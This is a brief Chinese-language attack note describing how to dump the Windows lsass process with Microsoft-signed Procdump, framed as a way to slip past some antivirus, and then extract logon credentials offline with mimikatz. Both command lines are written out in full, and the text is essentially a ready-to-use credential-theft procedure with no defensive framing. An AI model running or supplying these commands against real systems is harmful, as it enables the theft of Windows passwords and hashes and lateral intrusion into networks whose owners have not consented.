微软签名工具读取lsass进程

首先用管理员身份运行Procdump转储内存，这个工具是微软签名的合法二进制文件，但遇上其他杀毒软件可能会失效；该方法在Windows篡改防护之前的Windows版本有用

Procdump64.exe -accepteula -ma lsass.exe lsass.dmp

然后讲lsass.dmp复制出来到本机使用mimikatz读取

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords full" "exit"